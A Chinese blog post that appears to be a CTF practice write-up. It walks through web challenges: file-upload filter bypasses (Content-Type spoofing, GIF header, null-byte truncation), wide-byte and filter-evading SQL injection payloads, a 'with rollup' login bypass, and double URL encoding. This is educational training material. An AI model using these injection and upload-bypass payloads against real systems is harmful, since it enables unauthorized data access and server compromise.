寒假第一周CTFwp

最新推荐文章于 2024-06-20 01:36:54 发布
最新推荐文章于 2024-06-20 01:36:54 发布
阅读量423 收藏
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/79450628
版权

1. 文件上传测试1

mark
不用想也知道直接上传php文件,是不行的。果然返回非图片文件。

抓包看一下,Content-Type为application/octet-stream,将其改为image/gif,放包。
mark
上传成功后返回flag。

2. 文件上传测试2

mark

直接上传php,抓包改参数,上传报错。

于是想到上传检验的另一种方法,怀疑采用文件头检验的方式。于是将php文件重命名为.gif,并且在文件头部加上gif的文件头内容,即GIF 89a
抓包发现Content-Type字段是对的。
放包得到flag

反思:在做第二题的时候竟然卡了,原因是模糊记得gif格式为GIF 89A,却忘了中间的空格,然后还忘了后面的a为小写。有的东西不能想当然,实在不该,mdzz。。。

SQL注入

3. 宽字节注入

还是先做表哥要做的两个SQL题吧。
首先试着用id=1 和 id=1’ 试一试,发现页面都没报错,难道不存在注入点?
这里估计id=1和id=1’没报错是因为使用了转义函数,将 ’ 转义为了\’。一般情况下,不会出现页面报错,看上去好像就没有注入点了。
mark
mark
想起来之前看见过由于编码漏洞导致的宽字节注入。于是尝试:

http://103.238.227.13:10083/?id=1%df%27

发现报错,说明的确是宽字节注入。
mark

所谓宽字节注入,就是数据库gbk编码时,在SQL语句中,如果一个字符的ascii码大于127,会与后一个编码一起当做中文处理。而当我用%df会和\的URL码即%5c
一起被当做中文处理了,这样后面的 ’ 就逃逸检查出来了。更多内容参考SQL宽字节注入

接下来就和常规操作差不多了。

payload

1.构造语句查看一下数据库名

http://103.238.227.13:10083/?id=1%df%27 union select 1,database()%23

mark
2.构造语句查看字段值

http://103.238.227.13:10083/?id=1%df%27 union select 1,string from sql5.key where id = 1%23

mark

3.总结:
由于本题很直接的告诉了我们,要找的字段就省了很多事,只要知道是宽字节注入,就很容易了。

4. 用标签绕过过滤

题目给出源码,但是看完,我方了,貌似给过滤干净了,没得玩了。

//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
    if (substr_count($id, $value) > 0)
    {
        exit('包含敏感关键字!'.$value);
    }
}

//xss过滤
$id = strip_tags($id);

$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

但是看到XSS过滤那行,突然发现,这个函数可能有猫腻。于是翻手册:

strip_tags — 从字符串中去除 HTML 和 PHP 标记
也就是说,我们如果在id值中加入HTML,php标签会被去掉。

这下就有思路了,可以尝试用HTML标签绕过检查!

payload

查数据库

http://103.238.227.13:10087?id=-1 un<a>ion se<p>lect 1,dat<a>abase()

mark
查要求的字段值 

http://103.238.227.13:10087?id=-1 un<a>ion se<p>lect 1,hash fr<a>om sql3.key
或
http://103.238.227.13:10087?id=-1 un<a>ion se<p>lect 1,hash fr<a>om .key

mark

5. 实验吧-后台登录

mark

这个题其实有点无语,一开始以为是SQL注入,反复试都没有结果,看到下面有人提示说是脑洞,文件名,于是尝试把php的文件名输入,竟然就出来flag了。。。。

6. 实验吧-因吹斯听的绕过

查看源码,只有一行,根据源码的提示source.txt有猫腻,可以看php的源码。

view-source:http://ctf5.shiyanbar.com/web/pcat/source.txt

mark

分析源码:

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);

过滤输入“and|select|from|where|union|join|sleep|benchmark|,|(|)”

$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇!";
    }
}else{
    print "一颗赛艇!";
}

如果用户输入的pwd和数据库中查询的pwd相同的话,输出CTF{XXXXXX},否则输出其它的!
我们需要做的就是让用户输入的pwd和数据库中查询的pwd相同。

这里懵逼了很久,看了别人的提示,with rollup 统计

mysql> select * from test group by pwd with rollup;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
| admin | mypass     |
| admin | NULL       |
+-------+------------+
3 rows in set

mysql> select * from test group by pwd with rollup limit 1
;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
+-------+------------+
mysql> select * from test group by pwd with rollup limit 1 offset 0
;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
+-------+------------+
1 row in set
mysql> select * from test group by pwd with rollup limit 1 offset 1
;
+-------+--------+
| user  | pwd    |
+-------+--------+
| admin | mypass |
+-------+--------+
1 row in set
mysql> select * from test group by pwd with rollup limit 1 offset 2
;
+-------+------+
| user  | pwd  |
+-------+------+
| admin | NULL |
+-------+------+
1 row in set

然后,我们如果按照这种统计方法,就可以绕过检查,直接查询pwd为空的一行。因为我们填写表单的时候,pwd也为空。就可以出flag了。

然后就可以构造payload了:

' or 1=1 group by pwd with rollup limit 1 offset 2 #

这道题,学到了用with rollup 统计排序,利用这个查数据,从而绕过。

7. 登陆一下好吗??

这道题,提示过滤了很多东西,然后要你SQL注入。
比较容易试出来,过滤了一些字符,如:or – # /**/ union select,

但是,空格和and 都没有过滤,然后因为SQL语句,大概是

select ...from ....where username ='   ' and password = '   ';

于是,我在username输入 ‘=’
password 输入 ‘=’

这样sql语句变成了:

select ...from ....where username =''='' and password = ''=''

由于等号从左往右逻辑计算,username= ” 结果是0,0=” 由于弱类型,返回真。最后相当于 1 and 1 显然永真。
于是返回了数据库所有数据。

8. 实验吧-上传绕过

上传一张图片,发现,要改后缀名为php。

mark

直接在filename里改,结果不行。
mark

于是想到可能是%00截断。但是在filename里直接截断,发现也不对。

之后在返回的结果发现,upload路径也有可能可以改成php。于是改成upload/1.php+
将+(2b)改成 00 ,就OK了。
mark

9. 实验吧-PHP大法

页面情况:
mark
得到第一个提示:index.php.txt
访问后,得到源码:

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?

分析源码,容易得到结论:
id不能是hackerDJ,但是url转码后要是hackerDJ。

比较容易想到,构造一个hackerDJ,urlencoding:

%68%61%63%6b%65%72%44%4a

但是由于输入url会有一次urldecoding,然后php里又有一次urldecoing,所以一共是两次urldecoding,因此,需要相应的两次urlencoing。即%68变成%2568。
最后的payload:

%2568%2561%2563%256b%2565%2572%2544%254a
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021黑盾杯CTF部分WP
qq_45149716的博客
12-05 5046
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7691
BUUCTF题目Misc部分wp(持续更新)
CTF练习题WP1
m0_73891130的博客
03-25 615
自己写的CTF常用网站的练习题目的WP,当然也有参考网上的大佬的WP
PolarCTF2024冬季个人挑战赛wp含web、misc、crypto_polar冬季赛
最新发布
2401_84263282的博客
06-20 752
,3(S-#4V题目名字包含uu,推测是uuencode,得到123456,应该是某个压缩包密码尝试过各种音频隐写,都不对,赛后看讲解视频才发现是steghide,其实这个123456或许能够猜到(???得到flag.txt,再拿去uuencode解码一下。
2023 天使杯CTF --- wp
3tefanie丶zhou的博客
06-03 1229
【人,终究会被年少不可得之物困其一生】
【第六届强网杯CTF-Wp】
qq_45603443的博客
08-02 2487
第六届强网杯全国网络安全挑战赛wp
寒假第一周.py
01-21
寒假第一周.py
寒假后开学第一天.doc
09-16
【开学准备】 开学第一天往往是学生们从假期模式切换到学习模式的关键时刻。寒假期间的轻松氛围随着开学的日子逐渐消失,学生们需要重新调整生物钟,适应早起的生活节奏。描述中的内容提到一位学生因睡过头差点迟到...
寒假后开学第一天精选.doc
10-11
寒假后开学第一天精选.doc
2018_2019学年高一英语寒假作业第一天
08-05
第一句中,"travelled"应改为"travels",因为"light"是不可数名词,谓语动词应用第三人称单数形式。第二句没有错误,"which"引导定语从句修饰"The baby",表示"Tom正在照顾的那个婴儿"。第三句中,"When comes to"应...
寒假考核wp1
08-04
### 寒假考核WP1知识点解析 #### 一、任务背景与目标 寒假考核WP1主要涉及了两个方面的内容:**命令执行与渗透测试**。根据描述,这是一次技术实践,旨在通过解决实际问题来提升参与者的技能水平。本解析将详细探讨...
2022年暑期CTF刷题WP(停止更新)
qq_52820087的博客
06-19 3564
2022年暑期CTF刷题之路
ctfshow大部分wp(附带个人整理知识笔记)
ZxC789456302的博客
10-01 7123
WEB信息搜集入门(前10道都是水题,10题后没有水题了)源码中即为flag(签到题)前端js拦截,查看源代码即可,得到flagflag在响应头里面在访问robots.txt,得知存在flagishere.txt文件,访问获得flagphps源码泄露,访问index.phps,下载文件打开得到flag访问www.zip获取配置文件得知在服务器下存在fl000g.txt,线上访问得到flag访问.git(隐藏文件)注意格式为/.git/,得到flag隐藏文件的第二种情况,访问.svn,格式为/.svn/,得到
CTFShow-WEB入门篇文件上传详细Wp(151-170)
Aluxian_的博客
07-16 2122
【代码】CTFShow-WEB入门篇文件上传详细Wp(115-170)
2023年第七届蓝帽杯半决赛WP(CTF&取证)
weixin_63576152的博客
09-18 1496
打开xlsx文件,打开以后,发现没有字,ctrl+a全选,修改你字体颜色,发现有些加粗,有些没加粗,结合题目,应当排序,将每一列从小到大排序,将加粗的单元格改成黑色,将列宽改为2,得到二维码,扫描后得到flag。对SMS.txt的加密逻辑是先AES加密,再base64加密,AES的秘钥在Getkey函数中。base64解码calllog.txt,得到通话记录,搜索10086结果是2条,且都为呼进。Base64、BASE64都是错的,答案格式模糊,而且base64是编码,不是很懂。
上海磐石ctf部分wp
weixin_44807430的博客
05-28 295
磐石wp
CTF】Web反序列wp
毅哥的博客
12-30 269
一道关于反序列法的web题 <?php error_reporting(0); $name=$_GET['name']; $age=$_GET['age']; $pop=$_GET['pop']; if(isset($name) && isset($age)){ $word = unserialize($pop); if($word->cname($name,$age)){ $word->cflag(); }e
ctf wp 汇总
freshfox的博客
07-06 1079
ctf
如何用python做一个寒假学习时间表
02-07
# 每周的第一天 week_start = today + datetime.timedelta(weeks=i, days=0) # 每周的最后一天 week_end = today + datetime.timedelta(weeks=i, days=6) print(f'Week {i+1}: {week_start} - {week_end}') ```...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值